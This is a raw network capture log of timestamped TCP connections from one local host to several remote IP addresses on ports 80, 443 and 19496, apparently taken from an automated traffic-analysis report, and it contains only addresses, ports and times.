                                      Sep 7, 2024 01:47:09.360850096 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:09.628407955 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:09.628473997 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:21.225466013 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.225517035 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.225593090 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.227606058 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.227618933 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.697335958 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.697427034 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.698911905 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.698935032 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.699163914 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.713669062 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.760504961 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.842067003 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.842164993 CEST44349715188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:21.842262983 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.843019962 CEST49715443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:21.844043016 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:21.844080925 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:21.844208956 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:21.845304966 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:21.845319033 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.393829107 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.393898010 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.395344019 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.395354986 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.395584106 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.396456003 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.440500975 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790112972 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790158033 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790188074 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790237904 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.790251017 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790262938 CEST44349716104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:22.790302992 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:22.792145967 CEST49716443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.070728064 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.070784092 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.070924044 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.073132992 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.073147058 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.535701990 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.535768986 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.537739038 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.537755013 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.538063049 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.552233934 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.596496105 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.656306028 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.656372070 CEST44349718188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:24.656447887 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.657272100 CEST49718443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:24.658461094 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.658494949 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:24.658719063 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.658932924 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:24.658951044 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.257791996 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.257863998 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.259352922 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.259361982 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.259628057 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.260581970 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.308510065 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414566040 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414613008 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414639950 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414685965 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.414701939 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414720058 CEST44349719104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:25.414748907 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.414777040 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:25.416285992 CEST49719443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:28.572516918 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:28.572554111 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:28.572621107 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:28.574727058 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:28.574738979 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.040443897 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.040508986 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.044903040 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.044909954 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.045165062 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.066667080 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.108511925 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.187474966 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.187532902 CEST44349720188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:29.187664986 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.188571930 CEST49720443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:29.191992044 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.192039967 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.192116022 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.192344904 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.192359924 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.656769991 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.656836987 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.658653975 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.658663988 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.658900976 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.659924984 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.700501919 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804719925 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804763079 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804799080 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804838896 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.804850101 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804883003 CEST44349721104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:29.804927111 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:29.806777954 CEST49721443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.289115906 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.289165020 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.289233923 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.291075945 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.291090965 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.757816076 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.757890940 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.760207891 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.760219097 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.760447979 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.774905920 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.816505909 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.891201019 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.891455889 CEST44349722188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:31.891505003 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.891876936 CEST49722443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:31.893212080 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.893254995 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:31.893317938 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.893572092 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:31.893589973 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.374461889 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.374664068 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.377048016 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.377057076 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.377301931 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.385031939 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.428508043 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538841963 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538885117 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538913965 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.538986921 CEST44349723104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:32.539019108 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.541037083 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:32.541174889 CEST49723443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:36.078308105 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:36.078356981 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:36.078423977 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:36.080851078 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:36.080864906 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.574234962 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.574335098 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.576477051 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.576493025 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.576745033 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.588665962 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.636503935 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.940773964 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.940846920 CEST44349724188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:37.941050053 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:37.948457003 CEST49724443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:38.010798931 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.010852098 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.011046886 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.011250973 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.011274099 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.627105951 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.627175093 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.628473997 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.628492117 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.628746033 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.629841089 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.672507048 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.775988102 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776034117 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776066065 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776076078 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.776093960 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776128054 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.776135921 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776149035 CEST44349725104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:38.776181936 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:38.778516054 CEST49725443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.117044926 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.117117882 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.117444992 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.121042967 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.121064901 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.719491959 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:40.719564915 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:40.719893932 CEST8049704208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:40.719940901 CEST4970480192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:40.722439051 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.722503901 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.723833084 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.723839998 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.724073887 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.739521980 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.784501076 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.884877920 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.884947062 CEST44349726188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:40.884999037 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.885936975 CEST49726443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:40.890999079 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.891036987 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:40.891119003 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.891606092 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:40.891621113 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.053236008 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:41.058056116 CEST1949649728147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:41.058119059 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:41.219234943 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:41.225121021 CEST1949649728147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:41.354162931 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.354257107 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.373048067 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.373076916 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.373325109 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.381043911 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.428510904 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.529901981 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.529956102 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.529983997 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530081034 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.530098915 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530414104 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.530536890 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530597925 CEST44349727104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:41.530716896 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:41.532512903 CEST49727443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.219212055 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.219273090 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.219389915 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.221890926 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.221906900 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.687169075 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.687274933 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.689735889 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.689745903 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.689990997 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.702713013 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.744503975 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.814980030 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.815052986 CEST44349729188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:45.815396070 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.817173958 CEST49729443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:45.826802969 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.826841116 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:45.826922894 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.827218056 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:45.827234030 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:45.854971886 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:45.859785080 CEST8049731208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:45.861113071 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:45.861299038 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:45.866040945 CEST8049731208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:46.022404909 CEST1949649728147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:46.022475958 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:46.303070068 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.303184032 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.304349899 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.304358006 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.304739952 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.305510998 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.352492094 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.654433012 CEST8049731208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:46.654824972 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.654838085 CEST8049731208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:46.654879093 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.654886007 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:46.654906034 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.654920101 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.654934883 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.654973984 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.654987097 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.654995918 CEST44349730104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:46.655034065 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.657810926 CEST49730443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:46.667299032 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:46.672354937 CEST8049731208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:46.672406912 CEST4973180192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:48.876451015 CEST4972819496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:49.271950960 CEST1949649728147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:49.285444021 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:49.285489082 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:49.285547972 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:49.286094904 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:49.286111116 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:49.331330061 CEST4973319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:49.336178064 CEST1949649733147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:49.336285114 CEST4973319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:49.498176098 CEST4973319496192.168.2.5147.185.221.22
                                      Sep 7, 2024 01:47:49.502984047 CEST1949649733147.185.221.22192.168.2.5
                                      Sep 7, 2024 01:47:49.721319914 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:49.721376896 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:49.721882105 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:49.724082947 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:49.724093914 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:49.748125076 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:49.748229027 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:49.774720907 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:49.774746895 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:49.774990082 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:49.787568092 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:49.787817955 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:49.794353962 CEST8049708208.95.112.1192.168.2.5
                                      Sep 7, 2024 01:47:49.794425964 CEST4970880192.168.2.5208.95.112.1
                                      Sep 7, 2024 01:47:49.832510948 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.156783104 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.166019917 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.166043997 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.196436882 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:50.196556091 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:50.197922945 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:50.197933912 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:50.198175907 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:50.209713936 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:50.252496958 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:50.329401970 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:50.329458952 CEST44349734188.114.97.3192.168.2.5
                                      Sep 7, 2024 01:47:50.329792023 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:50.330869913 CEST49734443192.168.2.5188.114.97.3
                                      Sep 7, 2024 01:47:50.338387966 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.338428974 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.338664055 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.338911057 CEST49735443192.168.2.5104.21.85.189
                                      Sep 7, 2024 01:47:50.338923931 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.445755005 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.445873022 CEST44349732162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.445933104 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.446939945 CEST49732443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.448007107 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.448045969 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.448113918 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.448343992 CEST49738443192.168.2.5162.159.135.232
                                      Sep 7, 2024 01:47:50.448355913 CEST44349738162.159.135.232192.168.2.5
                                      Sep 7, 2024 01:47:50.807161093 CEST44349735104.21.85.189192.168.2.5
                                      Sep 7, 2024 01:47:50.807240009 CEST49735443192.168.2.5104.21.85.189
